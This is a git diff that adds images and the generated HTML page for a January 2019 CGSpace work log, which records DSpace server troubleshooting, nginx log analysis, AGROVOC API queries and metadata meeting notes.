diff --git a/docs/2018/02/jmx_dspace-sessions-day.png b/docs/2018/02/jmx_dspace-sessions-day.png
new file mode 100644
index 000000000..e8ad64e58
Binary files /dev/null and b/docs/2018/02/jmx_dspace-sessions-day.png differ
diff --git a/docs/2018/02/jmx_dspace_sessions-day.png b/docs/2018/02/jmx_dspace_sessions-day.png
new file mode 100644
index 000000000..5b102d117
Binary files /dev/null and b/docs/2018/02/jmx_dspace_sessions-day.png differ
diff --git a/docs/2018/02/postgresql-locks-week.png b/docs/2018/02/postgresql-locks-week.png
new file mode 100644
index 000000000..80293d7f6
Binary files /dev/null and b/docs/2018/02/postgresql-locks-week.png differ
diff --git a/docs/2018/02/xmlui-orcid-display.png b/docs/2018/02/xmlui-orcid-display.png
new file mode 100644
index 000000000..4e503cb80
Binary files /dev/null and b/docs/2018/02/xmlui-orcid-display.png differ
diff --git a/docs/2018/03/layout-only-citation.png b/docs/2018/03/layout-only-citation.png
new file mode 100644
index 000000000..db6544128
Binary files /dev/null and b/docs/2018/03/layout-only-citation.png differ
diff --git a/docs/2018/04/jmx_dspace_sessions-week.png b/docs/2018/04/jmx_dspace_sessions-week.png
new file mode 100644
index 000000000..3d91f0b72
Binary files /dev/null and b/docs/2018/04/jmx_dspace_sessions-week.png differ
diff --git a/docs/2018/05/openrefine-solr-conciliator.png b/docs/2018/05/openrefine-solr-conciliator.png
new file mode 100644
index 000000000..369b4278a
Binary files /dev/null and b/docs/2018/05/openrefine-solr-conciliator.png differ
diff --git a/docs/2018/09/tomcat_maxtime-week.png b/docs/2018/09/tomcat_maxtime-week.png
new file mode 100644
index 000000000..e0dc7a47c
Binary files /dev/null and b/docs/2018/09/tomcat_maxtime-week.png differ
diff --git a/docs/2018/12/postgres_connections_db-month.png b/docs/2018/12/postgres_connections_db-month.png
new file mode 100644
index 000000000..6a9bf25a6
Binary files /dev/null and b/docs/2018/12/postgres_connections_db-month.png differ
diff --git a/docs/2019-01/index.html b/docs/2019-01/index.html
new file mode 100644
index 000000000..441b15273
--- /dev/null
+++ b/docs/2019-01/index.html
@@ -0,0 +1,1318 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2019" />
+<meta property="og:description" content="2019-01-02
+
+Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
+I don&rsquo;t see anything interesting in the web server logs around that time though:
+
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-01/" />
+<meta property="article:published_time" content="2019-01-02T09:48:30+02:00" />
+<meta property="article:modified_time" content="2022-03-22T22:03:59+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2019"/>
+<meta name="twitter:description" content="2019-01-02
+
+Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
+I don&rsquo;t see anything interesting in the web server logs around that time though:
+
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-01/",
+  "wordCount": "5531",
+  "datePublished": "2019-01-02T09:48:30+02:00",
+  "dateModified": "2022-03-22T22:03:59+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-01/">
+
+    <title>January, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-01/">January, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-01-02">2019-01-02</h2>
+<ul>
+<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
+<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+</code></pre><ul>
+<li>Analyzing the types of requests made by the top few IPs during that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 54.70.40.11 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
+     30 bitstream
+    534 discover
+    352 handle
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 207.46.13.1 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
+    194 bitstream
+    345 handle
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 46.101.86.248 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
+    261 handle
+</code></pre><ul>
+<li>It&rsquo;s not clear to me what was causing the outbound traffic spike</li>
+<li>Oh nice! The once-per-year cron job for rotating the Solr statistics actually worked now (for the first time ever!):</li>
+</ul>
+<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
+Moving: 1837285 into core statistics-2011
+Moving: 3764612 into core statistics-2012
+Moving: 4557946 into core statistics-2013
+Moving: 5483684 into core statistics-2014
+Moving: 2941736 into core statistics-2015
+Moving: 5926070 into core statistics-2016
+Moving: 10562554 into core statistics-2017
+Moving: 18497180 into core statistics-2018
+</code></pre><ul>
+<li>This could by why the outbound traffic rate was high, due to the S3 backup that run at 3:30AM&hellip;</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot the server</li>
+</ul>
+<h2 id="2019-01-03">2019-01-03</h2>
+<ul>
+<li>Update local Docker image for DSpace PostgreSQL, re-using the existing data volume:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo docker pull postgres:9.6-alpine
+$ sudo docker rm dspacedb
+$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+</code></pre><ul>
+<li>Testing DSpace 5.9 with Tomcat 8.5.37 on my local machine and I see that Atmire&rsquo;s Listings and Reports still doesn&rsquo;t work
+<ul>
+<li>After logging in via XMLUI and clicking the Listings and Reports link from the sidebar it redirects me to a JSPUI login page</li>
+<li>If I log in again there the Listings and Reports work&hellip; hmm.</li>
+</ul>
+</li>
+<li>The JSPUI application—which Listings and Reports depends upon—also does not load, though the error is perhaps unrelated:</li>
+</ul>
+<pre tabindex="0"><code>2019-01-03 14:45:21,727 INFO  org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
+2019-01-03 14:45:21,971 INFO  org.dspace.app.webui.discovery.DiscoverUtility @ facets for scope, null: 23
+2019-01-03 14:45:22,115 WARN  org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=9471D72242DAA05BCC87734FE3C66EA6:internal_error:-- URL Was: http://localhost:8080/jspui/internal-error
+-- Method: GET
+-- Parameters were:
+
+org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discovery/static-tagcloud-facet.jsp (line: [57], column: [8]) No tag [tagcloud] defined in tag library imported with prefix [dspace]
+    at org.apache.jasper.compiler.DefaultErrorHandler.jspError(DefaultErrorHandler.java:41)
+    at org.apache.jasper.compiler.ErrorDispatcher.dispatch(ErrorDispatcher.java:291)
+    at org.apache.jasper.compiler.ErrorDispatcher.jspError(ErrorDispatcher.java:97)
+    at org.apache.jasper.compiler.Parser.processIncludeDirective(Parser.java:347)
+    at org.apache.jasper.compiler.Parser.parseIncludeDirective(Parser.java:380)
+    at org.apache.jasper.compiler.Parser.parseDirective(Parser.java:481)
+    at org.apache.jasper.compiler.Parser.parseElements(Parser.java:1445)
+    at org.apache.jasper.compiler.Parser.parseBody(Parser.java:1683)
+    at org.apache.jasper.compiler.Parser.parseOptionalBody(Parser.java:1016)
+    at org.apache.jasper.compiler.Parser.parseCustomTag(Parser.java:1291)
+    at org.apache.jasper.compiler.Parser.parseElements(Parser.java:1470)
+    at org.apache.jasper.compiler.Parser.parse(Parser.java:144)
+    at org.apache.jasper.compiler.ParserController.doParse(ParserController.java:244)
+    at org.apache.jasper.compiler.ParserController.parse(ParserController.java:105)
+    at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:202)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:373)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:350)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:334)
+    at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:595)
+    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:399)
+    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
+    at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:728)
+    at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:470)
+    at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:395)
+    at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:316)
+    at org.dspace.app.webui.util.JSPManager.showJSP(JSPManager.java:60)
+    at org.apache.jsp.index_jsp._jspService(index_jsp.java:191)
+    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:476)
+    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
+    at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:493)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:234)
+    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:650)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
+    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:800)
+    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
+    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:806)
+    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1498)
+    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+</code></pre><ul>
+<li>I notice that I get different JSESSIONID cookies for <code>/</code> (XMLUI) and <code>/jspui</code> (JSPUI) on Tomcat 8.5.37, I wonder if it&rsquo;s the same on Tomcat 7.0.92&hellip; yes I do.</li>
+<li>Hmm, on Tomcat 7.0.92 I see that I get a <code>dspace.current.user.id</code> session cookie after logging into XMLUI, and then when I browse to JSPUI I am still logged in&hellip;
+<ul>
+<li>I didn&rsquo;t see that cookie being set on Tomcat 8.5.37</li>
+</ul>
+</li>
+<li>I sent a message to the dspace-tech mailing list to ask</li>
+</ul>
+<h2 id="2019-01-04">2019-01-04</h2>
+<ul>
+<li>Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don&rsquo;t see anything around that time in the web server logs:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Jan/2019:1(7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    189 207.46.13.192
+    217 31.6.77.23
+    340 66.249.70.29
+    349 40.77.167.86
+    417 34.218.226.147
+    630 207.46.13.173
+    710 35.237.175.180
+    790 40.77.167.87
+   1776 66.249.70.27
+   2099 54.70.40.11
+</code></pre><ul>
+<li>I&rsquo;m thinking about trying to validate our <code>dc.subject</code> terms against <a href="http://aims.fao.org/agrovoc/webservices">AGROVOC webservices</a></li>
+<li>There seem to be a few APIs and the documentation is kinda confusing, but I found this REST endpoint that does work well, for example searching for <code>SOIL</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ http http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+Connection: Keep-Alive
+Content-Length: 493
+Content-Type: application/json; charset=utf-8
+Date: Fri, 04 Jan 2019 13:44:27 GMT
+Keep-Alive: timeout=5, max=100
+Server: Apache
+Strict-Transport-Security: max-age=63072000; includeSubdomains
+Vary: Accept
+X-Content-Type-Options: nosniff
+X-Frame-Options: ALLOW-FROM http://aims.fao.org
+
+{
+    &#34;@context&#34;: {
+        &#34;@language&#34;: &#34;en&#34;,
+        &#34;altLabel&#34;: &#34;skos:altLabel&#34;,
+        &#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
+        &#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
+        &#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
+        &#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
+        &#34;results&#34;: {
+            &#34;@container&#34;: &#34;@list&#34;,
+            &#34;@id&#34;: &#34;onki:results&#34;
+        },
+        &#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
+        &#34;type&#34;: &#34;@type&#34;,
+        &#34;uri&#34;: &#34;@id&#34;
+    },
+    &#34;results&#34;: [
+        {
+            &#34;lang&#34;: &#34;en&#34;,
+            &#34;prefLabel&#34;: &#34;soil&#34;,
+            &#34;type&#34;: [
+                &#34;skos:Concept&#34;
+            ],
+            &#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_7156&#34;,
+            &#34;vocab&#34;: &#34;agrovoc&#34;
+        }
+    ],
+    &#34;uri&#34;: &#34;&#34;
+}
+</code></pre><ul>
+<li>The API does not appear to be case sensitive (searches for <code>SOIL</code> and <code>soil</code> return the same thing)</li>
+<li>I&rsquo;m a bit confused that there&rsquo;s no obvious return code or status when a term is not found, for example <code>SOILS</code>:</li>
+</ul>
+<pre tabindex="0"><code>HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+Connection: Keep-Alive
+Content-Length: 367
+Content-Type: application/json; charset=utf-8
+Date: Fri, 04 Jan 2019 13:48:31 GMT
+Keep-Alive: timeout=5, max=100
+Server: Apache
+Strict-Transport-Security: max-age=63072000; includeSubdomains
+Vary: Accept
+X-Content-Type-Options: nosniff
+X-Frame-Options: ALLOW-FROM http://aims.fao.org
+
+{
+    &#34;@context&#34;: {
+        &#34;@language&#34;: &#34;en&#34;,
+        &#34;altLabel&#34;: &#34;skos:altLabel&#34;,
+        &#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
+        &#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
+        &#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
+        &#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
+        &#34;results&#34;: {
+            &#34;@container&#34;: &#34;@list&#34;,
+            &#34;@id&#34;: &#34;onki:results&#34;
+        },
+        &#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
+        &#34;type&#34;: &#34;@type&#34;,
+        &#34;uri&#34;: &#34;@id&#34;
+    },
+    &#34;results&#34;: [],
+    &#34;uri&#34;: &#34;&#34;
+}
+</code></pre><ul>
+<li>I guess the <code>results</code> object will just be empty&hellip;</li>
+<li>Another way would be to try with SPARQL, perhaps using the Python 2.7 <a href="https://pypi.org/project/sparql-client/">sparql-client</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ python2.7 -m virtualenv /tmp/sparql
+$ . /tmp/sparql/bin/activate
+$ pip install sparql-client ipython
+$ ipython
+In [10]: import sparql
+In [11]: s = sparql.Service(&#34;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&#34;, &#34;utf-8&#34;, &#34;GET&#34;)
+In [12]: statement=(&#39;PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; &#39;
+    ...: &#39;SELECT &#39;
+    ...: &#39;?label &#39;
+    ...: &#39;WHERE { &#39;
+    ...: &#39;{  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . } &#39;
+    ...: &#39;FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) . &#39;
+    ...: &#39;} LIMIT 10&#39;)
+In [13]: result = s.query(statement)
+In [14]: for row in result.fetchone():
+   ...:     print(row)
+   ...:
+(&lt;Literal &#34;fish catching&#34;@en&gt;,)
+(&lt;Literal &#34;fish harvesting&#34;@en&gt;,)
+(&lt;Literal &#34;fish meat&#34;@en&gt;,)
+(&lt;Literal &#34;fish roe&#34;@en&gt;,)
+(&lt;Literal &#34;fish conversion&#34;@en&gt;,)
+(&lt;Literal &#34;fisheries catches (composition)&#34;@en&gt;,)
+(&lt;Literal &#34;fishtail palm&#34;@en&gt;,)
+(&lt;Literal &#34;fishflies&#34;@en&gt;,)
+(&lt;Literal &#34;fishery biology&#34;@en&gt;,)
+(&lt;Literal &#34;fish production&#34;@en&gt;,)
+</code></pre><ul>
+<li>The SPARQL query comes from my notes in <a href="/cgspace-notes/2017-08/">2017-08</a></li>
+</ul>
+<h2 id="2019-01-06">2019-01-06</h2>
+<ul>
+<li>I built a clean DSpace 5.8 installation from the upstream <code>dspace-5.8</code> tag and the issue with the XMLUI/JSPUI login is still there with Tomcat 8.5.37
+<ul>
+<li>If I log into XMLUI and then nagivate to JSPUI I need to log in again</li>
+<li>XMLUI does not set the <code>dspace.current.user.id</code> session cookie in Tomcat 8.5.37 for some reason</li>
+<li>I sent an update to the dspace-tech mailing list to ask for more help troubleshooting</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-07">2019-01-07</h2>
+<ul>
+<li>I built a clean DSpace 6.3 installation from the upstream <code>dspace-6.3</code> tag and the issue with the XMLUI/JSPUI login is still there with Tomcat 8.5.37
+<ul>
+<li>If I log into XMLUI and then nagivate to JSPUI I need to log in again</li>
+<li>XMLUI does not set the <code>dspace.current.user.id</code> session cookie in Tomcat 8.5.37 for some reason</li>
+<li>I sent an update to the dspace-tech mailing list to ask for more help troubleshooting</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-08">2019-01-08</h2>
+<ul>
+<li>Tim Donohue responded to my thread about the cookies on the dspace-tech mailing list
+<ul>
+<li>He suspects it&rsquo;s a change of behavior in Tomcat 8.5, and indeed I see a mention of new cookie processing in the <a href="https://tomcat.apache.org/migration-85.html#Cookies">Tomcat 8.5 migration guide</a></li>
+<li>I tried to switch my XMLUI and JSPUI contexts to use the <code>LegacyCookieProcessor</code>, but it didn&rsquo;t seem to help</li>
+<li>I <a href="https://jira.duraspace.org/browse/DS-4140">filed DS-4140 on the DSpace issue tracker</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-11">2019-01-11</h2>
+<ul>
+<li>Tezira wrote to say she has stopped receiving the <code>DSpace Submission Approved and Archived</code> emails from CGSpace as of January 2nd
+<ul>
+<li>I told her that I haven&rsquo;t done anything to disable it lately, but that I would check</li>
+<li>Bizu also says she hasn&rsquo;t received them lately</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-14">2019-01-14</h2>
+<ul>
+<li>Day one of CGSpace AReS meeting in Amman</li>
+</ul>
+<h2 id="2019-01-15">2019-01-15</h2>
+<ul>
+<li>Day two of CGSpace AReS meeting in Amman
+<ul>
+<li>Discuss possibly extending the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to make community and collection statistics available</li>
+<li>Discuss new &ldquo;final&rdquo; CG Core document and some changes that we&rsquo;ll need to do on CGSpace and other repositories</li>
+<li>We agreed to try to stick to pure Dublin Core where possible, then use fields that exist in standard DSpace, and use &ldquo;cg&rdquo; namespace for everything else</li>
+<li>Major changes are to move <code>dc.contributor.author</code> to <code>dc.creator</code> (which MELSpace and WorldFish are already using in their DSpace repositories)</li>
+</ul>
+</li>
+<li>I am testing the speed of the WorldFish DSpace repository&rsquo;s REST API and it&rsquo;s five to ten times faster than CGSpace as I tested in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ time http --print h &#39;https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
+
+0.16s user 0.03s system 3% cpu 5.185 total
+0.17s user 0.02s system 2% cpu 7.123 total
+0.18s user 0.02s system 6% cpu 3.047 total
+</code></pre><ul>
+<li>In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;14/Jan/2019:(17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    157 31.6.77.23
+    192 54.70.40.11
+    202 66.249.64.157
+    207 40.77.167.204
+    220 157.55.39.140
+    326 197.156.105.116
+    385 207.46.13.158
+   1211 35.237.175.180
+   1830 66.249.64.155
+   2482 45.5.186.2
+</code></pre><h2 id="2019-01-16">2019-01-16</h2>
+<ul>
+<li>Day three of CGSpace AReS meeting in Amman
+<ul>
+<li>We discussed CG Core 2.0 metadata and decided some action points</li>
+<li>We discussed branding of AReS tool</li>
+</ul>
+</li>
+<li>Notes from our CG Core 2.0 metadata discussion:
+<ul>
+<li>Not Dublin Core:
+<ul>
+<li>dc.subtype</li>
+<li>dc.peer-reviewed</li>
+</ul>
+</li>
+<li>Dublin Core, possible action for CGSpace:
+<ul>
+<li>dc.description:
+<ul>
+<li>We use dc.description.abstract, dc.description (Notes), dc.description.version (Peer review status), dc.description.sponsorship (Funder)</li>
+<li>Maybe move abstract to dc.description</li>
+<li>Maybe notes moves to cg.description.notes???</li>
+<li>Maybe move dc.description.version to cg.peer-reviewed or cg.peer-review-status???</li>
+<li>Move dc.description.sponsorship to cg.contributor.donor???</li>
+</ul>
+</li>
+<li>dc.subject:
+<ul>
+<li>Wait for guidance, evaluate technical implications (Google indexing, OAI, etc)</li>
+</ul>
+</li>
+<li>Move dc.contributor.author to dc.creator</li>
+<li>dc.contributor Project
+<ul>
+<li>Recommend against creating new fields for all projects</li>
+<li>We use collections projects/themes/etc</li>
+</ul>
+</li>
+<li>dc.contributor Project Lead Center
+<ul>
+<li>MELSpace uses cg.contributor.project-lead-institute (institute is more generic than center)</li>
+<li>Maybe we use?</li>
+</ul>
+</li>
+<li>dc.contributor Partner
+<ul>
+<li>Wait for guidance</li>
+<li>MELSpace uses cg.contibutor.center (?)</li>
+</ul>
+</li>
+<li>dc.contributor Donor
+<ul>
+<li>Use cg.contributor.donor</li>
+</ul>
+</li>
+<li>dc.date
+<ul>
+<li>Wait for guidance, maybe move dc.date.issued?</li>
+<li>dc.date.accessioned and dc.date.available are automatic in DSpace</li>
+</ul>
+</li>
+<li>dc.language
+<ul>
+<li>Move dc.language.iso to dc.language</li>
+</ul>
+</li>
+<li>dc.identifier
+<ul>
+<li>Move cg.identifier.url to dc.identifier</li>
+</ul>
+</li>
+<li>dc.identifier  bibliographicCitation
+<ul>
+<li>dc.identifier.citation should move to dc.bibliographicCitation</li>
+</ul>
+</li>
+<li>dc.description.notes
+<ul>
+<li>Wait for guidance, maybe move to cg.description.notes ???</li>
+</ul>
+</li>
+<li>dc.relation
+<ul>
+<li>Maybe move cg.link.reference</li>
+<li>Perhaps consolodate cg.link.audio etc there&hellip;?</li>
+</ul>
+</li>
+<li>dc.relation.isPartOf
+<ul>
+<li>Move dc.relation.ispartofseries to dc.relation.isPartOf</li>
+</ul>
+</li>
+<li>dc.audience
+<ul>
+<li>Move cg.targetaudience to dc.audience</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Something happened to the Solr usage statistics on CGSpace
+<ul>
+<li>I looked on the server and the Solr cores are there (56GB!), and I don&rsquo;t see any obvious errors in dmesg or anything</li>
+<li>I see that the server hasn&rsquo;t been rebooted in 26 days so I rebooted it</li>
+</ul>
+</li>
+<li>After reboot the Solr stats are still messed up in the Atmire Usage Stats module, it only shows 2019-01!</li>
+</ul>
+<p><img src="/cgspace-notes/2019/01/solr-stats-incorrect.png" alt="Solr stats fucked up"></p>
+<ul>
+<li>In the Solr admin UI I see the following error:</li>
+</ul>
+<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+</code></pre><ul>
